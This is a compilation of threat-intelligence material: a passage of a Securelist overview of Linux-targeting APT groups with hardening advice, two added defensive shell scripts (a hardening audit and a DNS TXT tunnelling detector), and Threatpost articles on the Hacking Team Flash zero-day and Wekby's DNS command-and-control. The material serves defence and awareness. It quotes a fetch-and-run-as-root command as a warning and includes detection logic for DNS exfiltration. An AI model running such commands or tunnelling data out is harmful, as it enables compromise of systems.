Given the role this module plays in the infection lifecycle, it would suggest the presence of analogous later-stage, more sophisticated implants, although we weren't able to find any.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09130857/sl_overview_of_atps_02.png>)\n\n## HackingTeam\n\n[HackingTeam ](<https://securelist.com/spyware-hackingteam/37064/>)was an Italian information technology company that developed and sold intrusion and so called "legal surveillance software" to governments, law enforcement agencies and businesses around the world. Unfortunately for them, they were hacked and suffered a data breach in 2015, at the hands of the activist known as Phineas Phisher. The subsequent leak of 400GB of stolen company data, including source code and customer information, allowed these tools to be acquired, adapted and used by threat actors around the world, such as DancingSalome (aka Callisto). The leaked tools included a zero-day exploit for Adobe Flash (CVE-2015-5119) as well as sophisticated platforms capable of providing remote access, keylogging, general information recording and exfiltration, and perhaps most notably, the ability to retrieve Skype audio and video frames directly from memory, bypassing stream encryption. The RCS (Remote Control System) malware (aka Galileo, Da Vinci, Korablin, Morcut and Crisis) includes multiple components, including desktop agents for Windows, macOS and perhaps unsurprisingly\u2026 Linux.\n\n## Lazarus\n\nIn late 2018, we discovered a previously unknown malicious framework that we named [MATA](<https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/>) internally. This framework was used to target commercial companies in Korea, India, Germany and Poland. While we weren't able to find code overlaps with any other known actor, the Kaspersky Threat Attribution engine showed code similarities with Manuscrypt, complex malware used by Lazarus (aka Hidden Cobra). 
This framework, as with earlier malware developed by Lazarus, included a Windows backdoor. However, we also found a Linux variant that we believe was designed for networking devices.\n\nIn June 2020, we analyzed new macOS samples linked to Lazarus [Operation ](<https://securelist.com/operation-applejeus-sequel/95596/>)[AppleJeus](<https://securelist.com/operation-applejeus-sequel/95596/>) and TangoDaiwbo campaigns, used in financial and espionage attacks. The samples had been uploaded to VirusTotal. The uploaded files also included a Linux malware variant that included similar functionality to the macOS TangoDaiwbo malware. These samples confirm a development that we had highlighted two years earlier \u2013 that the group was actively developing non-Windows malware.\n\n## Sofacy\n\n[Sofacy](<https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/>) (aka APT28, Fancy Bear, STRONTIUM, Sednit and Tsar Team) is a highly active and prolific APT threat actor. From its high-volume zero-day deployment to its innovative, broad malware set, Sofacy is one of the top groups that we monitor. Among the tools in the group's arsenal is SPLM (also known as CHOPSTICK and XAgent), a second-stage tool used selectively against targets around the world. Over the years, Sofacy has developed modules for several platforms, including, in 2016, modules for Linux, detected as 'Fysbis'. The consistent artefacts seen over the years and across Windows, macOS, iOS and Linux suggests that the same developers, or a small core team, is modifying and maintaining the code.\n\n## The Dukes\n\nThe [Dukes is a sophisticated threat actor that was first documented by us in 2013](<https://securelist.com/the-miniduke-mystery-pdf-0-day-government-spy-assembler-0x29a-micro-backdoor/31112/>), but whose tools have been used in attacks dating back to 2008. 
The group is responsible for attacks against targets in Chechnya, Ukraine and Georgia, as well as western governments and NGOs, NATO and individuals – the group is thought to be behind the hack of the Democratic National Congress in 2016. The Dukes' toolset includes a comprehensive set of malware implementing similar functionality but coded in several different programming languages. The group's malware and campaigns include PinchDuke, GeminiDuke, CosmicDuke, MiniDuke, CozyDuke, OnionDuke, SeaDuke, HammerDuke and CloudDuke. At least one of these, SeaDuke, includes a Linux variant.

## The Lamberts

The Lamberts is a highly sophisticated threat actor group known to possess a huge malware arsenal, including passive, network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a color scheme to distinguish the various tools and implants used against different victims around the world.

[Image: Lamberts discovery timeline](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131046/sl_overview_of_atps_03.png>)

**_Lamberts discovery timeline_**

In 2017, we published an [overview of the Lamberts family](<https://securelist.com/unraveling-the-lamberts-toolkit/77990/>); further updates (GoldLambert, SilverLambert, RedLambert, BrownLambert) are available to customers of our [threat intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). The focus of the various Lamberts variants is definitely Windows. Nevertheless, signatures that we created for Green Lambert for Windows also triggered on a macOS variant of Green Lambert that was functionally similar to the Windows version. In addition, we identified samples of the SilverLambert backdoor compiled for both Windows and Linux.

## Tsunami backdoor

Tsunami (aka Kaiten) is a UNIX backdoor used by multiple threat actors since it was first seen in the wild in 2002.
The source code was made public some years ago, and there are now more than 70 variants. The source code compiles smoothly on a wide range of embedded devices, and there are versions for ARM, MIPS, Sparc and Cisco 4500/PowerPC. Tsunami remains a threat for Linux-based routers, DVRs and the increasing number of IoT (internet of things) devices. In 2016, a variant of Tsunami was used in the [Linux Mint hack](<https://securelist.com/beware-of-backdoored-linux-mint-isos/73893/>), where an unknown threat actor compromised the Linux Mint distribution ISOs to include a backdoor. We also observed the use of the Tsunami backdoor to surgically target a number of cryptocurrency users on Linux.

## Turla

Turla (aka Uroboros, Venomous Bear and Waterbug) is a prolific Russian-speaking group known for its covert exfiltration tactics, such as the use of [hijacked satellite connections](<https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/>), [water-holing of government websites](<https://securelist.com/the-epic-turla-operation/65545/>), covert channel backdoors, rootkits and [deception tactics](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07184135/Bartholomew-GuerreroSaade-VB2016.pdf>). This threat actor, like other APT groups, has made significant changes to its toolset over the years. Until 2014, every malware sample used by Turla that we had seen was designed for 32- or 64-bit versions of Windows.

[Image](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131207/sl_overview_of_atps_04.jpg>)

Then in December 2014, we published our report on [Penguin Turla](<https://securelist.com/the-penquin-turla-2/67962/>), a Linux component in the Turla arsenal. This is a stealth backdoor that doesn't require elevated privileges, i.e. administrator or root rights.
Even if someone with limited access to the system launches it, the backdoor can intercept incoming packets and run commands from the attackers on the system while maintaining stealth. It is also rather hard to uncover, so if it's installed on a compromised server, it could sit there unnoticed for a long time. Further research on Penguin Turla revealed that [its roots stretch back to the Moonlight Maze operation in the mid-1990s](<https://securelist.com/penquins-moonlit-maze/77883/>). In May this year, researchers from Leonardo published a report about [Penquin_x64](<https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf/541d279e-a827-38b4-99e8-3c23553cd66a>), a previously undocumented variant of the Penguin Turla Linux backdoor. Based on this report, we generated network probes that detect Penquin_x64-infected hosts at scale, allowing us to discover a couple of dozen infected servers in Europe and the US, as recently as July 2020. We believe that, following public documentation of GNU/Linux tools, Turla may have been repurposing Penguin to conduct operations other than traditional intelligence gathering.

## Two-Sail Junk

In January 2020, a watering hole was discovered that utilized a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The site appears to have been designed to target users in Hong Kong, based on the content of the landing page. For the time being, until we can link the campaign to a known group, we have given the name Two-Sail Junk to the threat actor behind this implant.
However, while [our public report](<https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/>) focused on the iOS implant, the project is broader than previously thought, supporting an Android implant and probably implants for Windows, Linux and macOS.

## WellMess

In March 2020, we began to actively track new C2 servers associated with malware commonly referred to as WellMess, indicating a potentially massive new wave of activity. This malware was [initially documented by JPCERT in July 2018](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) and has been sporadically active since then. There were rumors hinting at a possible connection with CozyDuke (aka APT29), along with speculation that the current activity was focused on the healthcare industry, although we were unable to verify either claim. WellMess is a Remote Access Trojan, written in .NET and Go (Golang), cross-compiled to be compatible with both Windows and Linux.

## WildNeutron

We [first published about WildNeutron in 2015](<https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/>), together with our colleagues from Symantec, who call it Morpho or Butterfly. This group, which rose to prominence with its 2012-2013 attacks on Twitter, Microsoft, Apple and Facebook, is one of the most elusive, mysterious and dynamic we have seen. Its arsenal included many interesting and innovative tools, such as LSA backdoors and IIS plugins, coupled with both zero-day-based and physical deployment. Unsurprisingly, in several known attacks WildNeutron used a custom Linux backdoor as well.

## Zebrocy

Zebrocy is custom malware that we have been tracking since 2015. The group using this malware started as a subset of Sofacy, but also has similarities and [overlaps with other APT groups](<https://securelist.com/zebrocys-multilanguage-malware-salad/90680/>).
The group has developed malware in several languages, including Delphi, AutoIT, .NET, C#, PowerShell and Go. Zebrocy has mainly targeted Central Asian government-related organizations, both in-country and in remote locations. The group makes extensive use of spear phishing to compromise Windows endpoints. However, its backdoors are configured to communicate directly with IP-assigned web server hosts over port 80, and [the group seems to favor Linux for this part of its infrastructure](<https://securelist.com/a-zebrocy-go-downloader/89419/>) – specifically, Apache 2.4.10 running on Debian Linux.

[Image](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/09131351/sl_overview_of_atps_05.png>)

## Recommendations for protecting Linux systems

One of the main reasons that Linux systems go unprotected is a false sense of security from using Linux instead of the far more popular (and more targeted) Windows. Nevertheless, we hope all the aforementioned points are convincing enough for you to start securing your Linux-based machines in a serious way.

The very first recommendation is to **maintain a list of trusted sources** of your software. Think about this in the same way as the recommended approach to Android or iOS apps – only installing applications from official repositories. In the Linux world we enjoy more freedom: for example, even if you are using Ubuntu, you're not restricted to Canonical's own repository. Any .DEB file, or even application source code from GitHub, is at your service. But please choose these sources wisely. Don't just blindly follow instructions like "Run this script from our server to install" or "curl https://install-url | sudo bash" – that is a security nightmare: you execute whatever the server returns, as root, with no chance to inspect or verify it first.

Please also be mindful of the **secure way to get applications** from these trusted repositories. Your channels to update the apps have to be encrypted using the HTTPS or SSH protocols.
Besides your trust in software sources and their delivery channel, it's critical for **updates to arrive in a timely fashion**. Most modern Linux flavors are able to do this for you, but a simple cron script would help you to stay more protected and to get all the patches as soon as they are released by developers.

The next thing we would recommend is checking network-related settings. With commands like "netstat -a" you can **identify and close all unnecessary open ports** on your host. Please avoid network applications you don't really need or don't use, to minimize your network footprint. We also strongly recommend that you **properly set up the firewall** from your Linux distribution, to filter traffic and log the host's network activity. It's also a very good idea not to go online directly, but through NAT.

To continue with the network-related security rules, we recommend **protecting your locally stored SSH keys** (used for your network services) with passphrases at least. In a more "paranoid" mode you could even **store the keys on external protected storage**, such as tokens from any trusted vendor. On the server side of connections, nowadays it's not that hard to **set up multi-factor authentication for SSH sessions**, such as messages to your phone or other mechanisms such as authenticator apps.

So far, our recommendations have covered software sources, the application delivery channel, avoiding an unnecessary network footprint and protection of encryption keys. One more idea we recommend for monitoring threats you couldn't find at the filesystem level is to **keep and analyze the network activity logs**. You could install and use an out-of-band network tap to independently monitor and analyze the network communications of your Linux systems.

As part of your threat model, you need to consider the possibility that, despite all the aforementioned measures, attackers can compromise your protection.
Think about the next protection step in terms of an attacker's persistence in the system. They will probably make changes to be able to start their Trojan automatically after the system reboots. So, you need to **regularly monitor the main configuration files as well as the integrity of system binaries**, just in case of file viruses. The logging approach mentioned above for network communication is fully applicable here: **the Linux auditing system collects system calls and file access records**. Additional daemons such as "osquery" can be used for the same task. Any suspicious files, URLs and IP addresses can be checked at the [Kaspersky Threat Intelligence Portal](<https://opentip.kaspersky.com/>).

Physical security of devices is also important. It doesn't matter how much attention you pay to network and system level hardening if your laptop ends up in an attacker's hands and you haven't taken steps to protect it from this attack vector. You should consider **full disk encryption and safe boot mechanisms** for physical security. A more spy-like approach would be to place tamper-evident security tape on your most critical hardware.

A dedicated [solution](<https://www.kaspersky.com/enterprise-security/endpoint>) with Linux security can simplify the protection task: web threat protection detects malicious and phishing websites; network threat protection detects network attacks in incoming traffic; behavior analysis detects malicious activity, while device control allows management of connected devices and access to them.

Our final recommendation relates to Docker. This is not a theoretical threat: infection of containers is a [very real issue](<https://www.zdnet.com/article/new-linux-malware-uses-dogecoin-api-to-find-c-c-server-addresses/?amp=1>). **Containerization doesn't provide security by itself**.
Some containers are quite isolated from the host, but not all – **network and file system interfaces exist** in them and in most cases there are bridges between the physical and containerized worlds.

Therefore, you can use a security solution that adds security into the development process. [Kaspersky Hybrid Cloud Security](<https://www.kaspersky.com/enterprise-security/devops-security>) includes integration with CI/CD platforms, such as Jenkins, through a script to scan Docker images for malicious elements at different stages.

To prevent supply-chain attacks, On-Access Scanning (OAS) and On-Demand Scanning (ODS) of containers, images, and local and remote repositories can be used. Namespace monitoring, flexible mask-based scan scope control and the ability to scan different layers of containers help to enforce secure development best practices.

We have broken down this list of recommendations into logical sections. Please bear in mind that, besides applying all the measures we have mentioned, you should also audit and check all the generated logs and any other messages regularly. Otherwise you could miss signs of intrusion. A final idea, for security enthusiasts, is to adopt active measures – to run penetration tests against your systems from time to time.

### Summary of recommendations:

 * Maintain a list of trusted software sources; avoid using unencrypted update channels.
 * Do not run binaries and scripts from untrusted sources. A widely advertised way to install programs with commands like "curl https://install-url | sudo bash" is a security nightmare.
 * Make sure your update procedure is effective. Set up automatic security updates.
 * Spend time setting up your firewall properly: make sure it logs network activity, block all ports you don't use, minimize your network footprint.
 * Use key-based SSH authentication; protect keys with passwords.
 * Use 2FA and store sensitive keys on external token devices (e.g. Yubikey).
 * Use an out-of-band network tap to independently monitor and analyze network communications of your Linux systems.
 * Maintain system executable file integrity. Review configuration file changes regularly.
 * Be prepared for insider/physical attacks: use full disk encryption, trusted/safe boot and put tamper-evident security tape on your critical hardware.
 * Audit the system, check logs for indicators of attacks.
 * Run penetration tests on your Linux setup.
 * Use a dedicated security solution for Linux with web and network protection, as well as features for DevOps protection.

Published 2020-09-10 by GReAT: https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/
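The SSH, open-port and file-integrity recommendations above, turned into checks that can be run and re-run from cron. This is an added example, not code from the Securelist article or from a Kaspersky product: `PasswordAuthentication`, `PermitRootLogin` and `AuthenticationMethods` are real OpenSSH directives and the listener table mimics `ss -tuln` output, but the policy thresholds, the sample inputs and the function names (`audit_sshd_config`, `unexpected_listeners`, `make_baseline`, `check_baseline`) are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not code from the Securelist article. Three checks that turn
# the recommendations above (key-only SSH with a second factor, minimal
# listening ports, integrity of binaries and configuration) into something
# auditable. All inputs are constructed in this file so it runs offline; the
# policy thresholds are this example's assumptions.
LC_ALL=C; export LC_ALL

# 1. sshd_config audit: one finding per weak directive. sshd honours the first
#    occurrence of a directive, so later duplicates are ignored here as well.
audit_sshd_config() {  # audit_sshd_config /path/to/sshd_config
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        { k = tolower($1); if (!(k in v)) v[k] = tolower($2) }
        END {
            if (v["passwordauthentication"] != "no")
                print "PasswordAuthentication is not no: enforce key-based login"
            if (v["permitrootlogin"] != "no")
                print "PermitRootLogin is not no: disable direct root login"
            if (v["authenticationmethods"] !~ /,/)
                print "AuthenticationMethods does not chain two factors (e.g. publickey,keyboard-interactive)"
        }' "$1"
}

# 2. Listening sockets bound to every interface whose port is not on the allow
#    list. Input is the table printed by `ss -tuln` (or `netstat -tuln`);
#    loopback-only listeners are ignored because they add no network footprint.
unexpected_listeners() {  # ss -tuln | unexpected_listeners "22 443"
    awk -v allow="$1" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $2 == "LISTEN" || $1 == "udp" {
            port = $5; sub(/.*:/, "", port)
            addr = $5; sub(/:[^:]*$/, "", addr)   # 0.0.0.0:22 -> 0.0.0.0, [::]:80 -> [::]
            if ((addr == "0.0.0.0" || addr == "*" || addr == "[::]") && !(port in ok))
                print $1, port, addr
        }'
}

# 3. Integrity baseline of a directory tree (e.g. /usr/bin or /etc): the idea
#    behind AIDE or Tripwire reduced to coreutils. Paths containing whitespace
#    are not handled, to keep the awk join readable.
make_baseline() {   # make_baseline DIR BASELINE_FILE
    (cd "$1" && find . -type f | sort | xargs sha256sum) > "$2"
}
check_baseline() {  # check_baseline DIR BASELINE_FILE -> "added|changed|removed path"
    tmp=$(mktemp)
    make_baseline "$1" "$tmp"
    awk 'FILENAME == ARGV[1] { old[$2] = $1; next }
         !($2 in old)        { print "added " $2; next }
         old[$2] != $1       { print "changed " $2 }
         { delete old[$2] }
         END { for (p in old) print "removed " p }' "$2" "$tmp"
    rm -f "$tmp"
}

# Constructed sample inputs (not captured from a real host).
sample_sshd_config() {  # sample_sshd_config weak|hardened
    if [ "$1" = weak ]; then
        printf '%s\n' 'Port 22' 'PasswordAuthentication yes' 'PermitRootLogin yes'
    else
        printf '%s\n' '# hardened' 'PasswordAuthentication no' 'PermitRootLogin no' \
            'AuthenticationMethods publickey,keyboard-interactive'
    fi
}
sample_ss_output() {
    printf '%s\n' \
        'Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port' \
        'tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*' \
        'tcp   LISTEN 0      128        127.0.0.1:631       0.0.0.0:*' \
        'tcp   LISTEN 0      128             [::]:8080         [::]:*' \
        'udp   UNCONN 0      0            0.0.0.0:111       0.0.0.0:*'
}

demo() {
    work=$(mktemp -d)
    sample_sshd_config weak > "$work/sshd_config"
    echo "== sshd_config findings"; audit_sshd_config "$work/sshd_config"
    echo "== listeners outside allow list (22 443)"; sample_ss_output | unexpected_listeners "22 443"
    mkdir "$work/bin"; printf 'v1' > "$work/bin/tool"
    make_baseline "$work/bin" "$work/baseline"
    printf 'v2' > "$work/bin/tool"                 # simulate a tampered binary
    echo "== integrity changes"; check_baseline "$work/bin" "$work/baseline"
    rm -rf "$work"
}
demo
```

Run `make_baseline` once from known-good media, keep the baseline file off the host, and schedule `check_baseline` from cron: a non-empty result is the file-level signal the auditd and osquery recommendation above is meant to surface. The listener check deliberately flags only sockets bound to all interfaces, which is the subset that widens the host's network footprint.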
## Threatpost: Adobe to Patch Hacking Team Flash Zero Day (2015-07-07)

Adobe tomorrow is expected to release an updated version of Flash Player that will patch a zero-day vulnerability uncovered among the 400 GB of data stolen from Hacking Team.

The controversial Italian intrusion and surveillance software vendor was breached and on Sunday, private documents, including internal emails and customer invoices, were leaked. The published loot shows sales to oppressive governments, a practice the company's marketing material says it did not engage in.

Adobe's [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>), published a short time ago, is short on details other than to say that the vulnerability has likely been publicly exploited. The vulnerability, CVE-2015-5119, affects Flash Player version 18.0.0.194 and earlier for Windows, Macintosh and Linux systems.

“Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,” said the Adobe advisory. The vulnerability was reported to Adobe by researcher Morgan Marquis-Boire and Google Project Zero. Marquis-Boire and Adobe confirmed to Threatpost that the patch will address the Hacking Team zero day.

As researchers comb through the hacked documents and data, there are likely to be other unreported flaws in popular software.
The Grugq, a security researcher based in Bangkok, said on his Twitter feed that a Windows zero-day is also documented.

> All that fear about 0day and HackingTeam had only 2 that are relevant (flash + win32k).
>
> — the grugq (@thegrugq) [July 7, 2015](<https://twitter.com/thegrugq/status/618293343819165696>)

Hacking Team plays in a market heavily scrutinized by security and privacy experts who say that oppressive governments such as Sudan and Ethiopia—both Hacking Team customers—can abuse the software to keep tabs on citizens and suppress the work of activists, journalists and others. Citizen Lab at the University of Toronto published an open [letter](<https://citizenlab.org/2015/03/open-letter-hacking-team-march-2015/>) earlier this year to Hacking Team executives asking why Ethiopian journalists were targeted by one of their customers, a supposed violation of the Milan-based company's policy.

Since the Hacking Team breach was disclosed on Sunday afternoon, the story has moved quickly as more details are disclosed about customers and internal operations; the highest revenue-producing countries for Hacking Team are Mexico, Italy and Morocco. The U.S. is also listed among its customers, with the Drug Enforcement Agency and FBI buying spyware from the firm.

It was also disclosed that Hacking Team had an [enterprise developer certificate from Apple](<https://threatpost.com/hacking-team-couldnt-hack-your-iphone/113636>), allowing it to build and sign OS X and iOS applications and distribute them internally. Apple has since revoked Hacking Team's certificate.

The EU Parliament, meanwhile, today asked the European Commission whether Hacking Team's sales to certain countries are a [violation of EU sanctions](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>).
Marietje Schaake, a Dutch member of the European Union Parliament, has been outspoken about the use of surveillance programs by sanctioned nations and has likened companies such as Hacking Team to modern-day arms dealers.

Source: https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658/

## Threatpost: Wekby APT Gang Seen Using DNS Tunneling for Command and Control (2016-05-25)

Palo Alto Networks is reporting a shift in malware tactics used by the APT group Wekby, which has added a rare but effective new tool to its bag of tricks. The security [firm reported on Tuesday](<http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/>) that over the past week, Wekby attackers have been turning to the technique known as DNS tunneling in lieu of more conventional HTTP delivery of command and control for remote access to infected computer networks.

Researchers discovered the change in strategy while monitoring an undisclosed U.S.-based high-tech firm targeted by the gang. Palo Alto Networks calls the DNS tunneling malware pisloader, adding that it has existed for some time but is seldom used. The use of the DNS-based attacks differs from Wekby's go-to malware HTTPBrowser, which is still used widely by the group, according to Ryan Olson, researcher at Palo Alto Networks' Unit 42 team.

“We found it really interesting that this pisloader malware technique not only was being used to exfiltrate data but also as a command and control mechanism,” Olson told Threatpost.
The malware is uncommon because of its limited use case for attacks and because it requires above-average technical sophistication by the perpetrator to configure. Domains used in the Wekby attack outlined by Palo Alto Networks include globalprint-us[.]com, ns1.logitech-usa[.]com and intranetwabcam[.]com.

DNS tunneling takes advantage of the TXT record type within the DNS protocol used by top- and second-level domain name system servers. A maximum of 255 bytes of data can be transported per DNS request between an endpoint and a DNS server using TXT records. For Wekby attackers that have already gained a foothold on targeted systems, the DNS tunneling of commands and the DNS tunneling used to exfiltrate data is extremely slow, but well suited for long-term APT campaigns.

In the case of pisloader, attackers would use their own DNS server to send and receive C2 commands to infected computers. Embedded in the DNS TXT records of the calls and responses between infected client and Wekby's DNS server would be a mix of five instructions: collect victim system information, list drives on the victim machine, list file information for a provided directory, upload a file to the victim machine, and spawn a command shell.

To obfuscate those commands, Wekby attackers use base32 encoding on the DNS TXT data, making it appear that the DNS TXT was simply garbage strings of DNS metadata.

For attackers, DNS tunneling is a double-edged sword, Olson said. “Pisloader is extremely hard to discover if you're not already looking for it. But with a limit of 255 bytes per message, uploading anything could take days to weeks without sounding alarms,” he said. But because pisloader was able to skirt many security products that don't inspect DNS traffic properly, attackers are willing to sacrifice speed for stealth, Olson said. For those reasons the use of pisloader is extremely rare, even among Wekby gangs.
In fact, the use of DNS as a C2 protocol has never been widely adopted by APT gangs. Olson said there are very few malware families with similar DNS tunneling attributes, such as [FrameworkPOS](<https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-variant-exfiltrates-data-via-dns-requests>), [C3PRO-RACCOON](<https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf>) and [FeederBot](<http://blog.cj2s.de/archives/28-Feederbot-a-bot-using-DNS-as-carrier-for-its-CC.html>).

Palo Alto Networks said it was able to link the pisloader malware to Wekby because it shared many characteristics with the HTTPBrowser RAT family – commonly used by Wekby. Palo Alto Networks said the Wekby APT group remains active, targeting many U.S.-based healthcare, telecommunications, aerospace, defense, and high-tech companies.

“The group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of HackingTeam's Flash zero-day exploit,” [according to Palo Alto Networks' report on pisloader](<http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/>). Palo Alto Networks has said that Wekby has often leveraged [the zero-day Adobe Flash exploit](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/>) (CVE-2015-5119) via spear phishing campaigns.
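A detector for the kind of DNS TXT tunnelling described in this report, written from the resolver operator's side. This is an added example; it is not code from Threatpost, Palo Alto Networks or Unit 42. The four-column log format, the thresholds, the registered-domain guess and the function names (`detect_dns_tunnel`, `sample_dns_log`) are this example's assumptions, and the sample log is constructed, using the first of the three indicator domains listed above (undefanged so the parser sees a real query name) as the suspicious one. It looks for the traits the report names: TXT queries, long left-most labels drawn only from the base32 alphabet, and a steady supply of never-repeated labels, which a tunnel needs to get past resolver caches.

```shell
#!/bin/sh
# Added example: heuristic detector for DNS TXT tunnelling. Not code from the
# Threatpost article or Palo Alto Networks; log format, thresholds and names
# are this example's assumptions.
#
# Input: one query per line, "<time> <client-ip> <qtype> <qname>" (assumed
# format). A registered domain is reported when
#   - it receives at least MIN_QUERIES TXT queries,
#   - at least MIN_QUERIES of them carry a left-most label of MIN_LABEL_LEN or
#     more characters built only from the base32 alphabet (a-z, 2-7), and
#   - at least half of those labels are unique (fresh names defeat caching).
detect_dns_tunnel() {   # detect_dns_tunnel [MIN_LABEL_LEN] [MIN_QUERIES] < log
    awk -v minlen="${1:-20}" -v minq="${2:-5}" '
        $3 == "TXT" {
            name = tolower($4); sub(/\.$/, "", name)     # drop trailing root dot
            n = split(name, lab, /\./)
            if (n < 3) next                              # apex query carries no data label
            dom = lab[n-1] "." lab[n]                    # crude registered-domain guess (assumption)
            first = lab[1]
            total[dom]++
            if (length(first) >= minlen && first ~ /^[a-z2-7]+$/) {
                hits[dom]++
                if (!((dom, first) in seen)) { seen[dom, first] = 1; uniq[dom]++ }
            }
        }
        END {
            for (d in total)
                if (total[d] >= minq && hits[d] >= minq && 2 * uniq[d] >= hits[d])
                    printf "%s txt=%d base32like=%d unique=%d\n", d, total[d], hits[d], uniq[d]
        }' | sort
}

# Constructed sample log (not a real capture): ordinary A/TXT lookups such as
# DMARC and DKIM records, plus six queries that look like encoded payload
# chunks under one of the domains named in the report.
sample_dns_log() {
cat <<'EOF'
2016-05-24T09:00:01 10.0.0.5 A www.example.com
2016-05-24T09:00:02 10.0.0.5 TXT _dmarc.example.com
2016-05-24T09:00:03 10.0.0.7 TXT selector1._domainkey.example.com
2016-05-24T09:00:04 10.0.0.5 TXT nbswy3dpeb3w64tmmqqho33smqqhe3dpmfzwk.globalprint-us.com
2016-05-24T09:00:05 10.0.0.5 TXT mfrggzdfmztwq2lknnwg23tpobyxe43uor4xezlz.globalprint-us.com
2016-05-24T09:00:06 10.0.0.5 TXT gezdgnbvgy3tqojqgezdgnbvgy3tqojqgezdgnbv.globalprint-us.com
2016-05-24T09:00:07 10.0.0.5 TXT onswy3dpebxw6ytemfzwk3rbon2gs3tdnrwwk5dt.globalprint-us.com
2016-05-24T09:00:08 10.0.0.5 TXT mjqxgzjtgizdgnbvgy3tqojqgezdgnbvgy3tqojq.globalprint-us.com
2016-05-24T09:00:09 10.0.0.5 TXT orsxg5bnmrqxiyjnmzxxe3lbor2gs3tdnrwwk5df.globalprint-us.com
2016-05-24T09:00:10 10.0.0.9 TXT example.org
2016-05-24T09:00:11 10.0.0.9 TXT example.org
EOF
}

# Usage: feed a resolver query log reformatted to the four columns above.
sample_dns_log | detect_dns_tunnel
```

The thresholds are deliberately loose for the demonstration; on a real resolver log, raise `MIN_QUERIES` and group by client as well as by domain, since the 255-byte-per-message limit the report mentions means a single infected host generates many queries over a long period rather than a burst. Legitimate TXT users (DMARC, DKIM, SPF) survive the filter because their left-most labels are short, repeated, or contain characters outside the base32 alphabet.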
That said, Olson told Threatpost that researchers couldn't be sure of the exploit used to gain a foothold in the high-tech firm targeted by Wekby attackers.

Source: https://threatpost.com/wekby-apt-gang-using-dns-tunneling-for-command-and-control/118303/

## Threatpost: Hacking Team Flash Zero Day Weaponized in Exploit Kits (2015-07-08)

Handlers for three major exploit kits have managed to utilize in short order a [zero-day vulnerability in Adobe Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsa15-03.html>) uncovered among the 400 GB of data stolen from Hacking Team.

Experts, including French researcher [Kafeine](<http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>) and a number of others from security companies, revealed last night that the Angler, Neutrino, and Nuclear kits had incorporated exploits for the zero day, which [Adobe has patched](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>).

The [Hacking Team breach](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>) was disclosed on Sunday and by Monday afternoon, word of the Flash zero day, along with an unpatched Windows kernel vulnerability, was circulating. Though the Hacking Team data included only a proof of concept that opened the computer's calculator, an extensive read-me document that accompanied it likely helped pave the way to the exploits.

> Flash 0day from [#HackingTeam](<https://twitter.com/hashtag/HackingTeam?src=hash>) with a nice readme. Works very well on Chrome etc.
> <http://t.co/nfqck54YhT> [pic.twitter.com/8uAQuUIXGV](<http://t.co/8uAQuUIXGV>)
>
> — webDEViL (@w3bd3vil) [July 6, 2015](<https://twitter.com/w3bd3vil/status/618168863708962816>)

A [Metasploit module](<https://github.com/rapid7/metasploit-framework/commit/2cdaace42f8f121e97f36f37fe1b3835dbeaef0a>) was also developed and integrated into the framework before integration into the exploit kits, Kafeine told Threatpost via email.

Adobe issued an advisory late Tuesday afternoon that it would today release an updated Flash Player. The vulnerability, CVE-2015-5119, affects Flash Player version 18.0.0.194 and earlier for Windows, Macintosh and Linux systems.

Security company Bromium, meanwhile, published an [analysis](<http://labs.bromium.com/2015/07/07/adobe-flash-zero-day-vulnerability-exposed-to-public/>) of the vulnerability, which is a byte array use-after-free memory issue that allows an attacker to gain control of a Windows machine running the vulnerable Flash Player. Researcher Nick Cano wrote that Hacking Team built its proof-of-concept code based on a 2014 vulnerability known as the ActionScript-Spray attack (CVE-2014-0322), which took advantage of a UAF bug in Internet Explorer to gain access to the heap of a process.

“HackingTeam's exploit uses this idea to achieve execution, but uses a UAF bug internal to the ActionScript 3 engine,” Cano wrote. The Bromium analysis provides in-depth detail on the vulnerability and how the Hacking Team PoC exploits it.

Cano said the Hacking Team exploit comes with shellcode for 32- and 64-bit Windows machines, as well as Mac OS X 64-bit machines, and mitigation bypasses for Microsoft's free EMET tool.

“We've tested this exploit with the latest updated Flash Player 18 and Internet Explorer which indicates that this is clearly a zero day risk to internet users today,” Cano wrote.
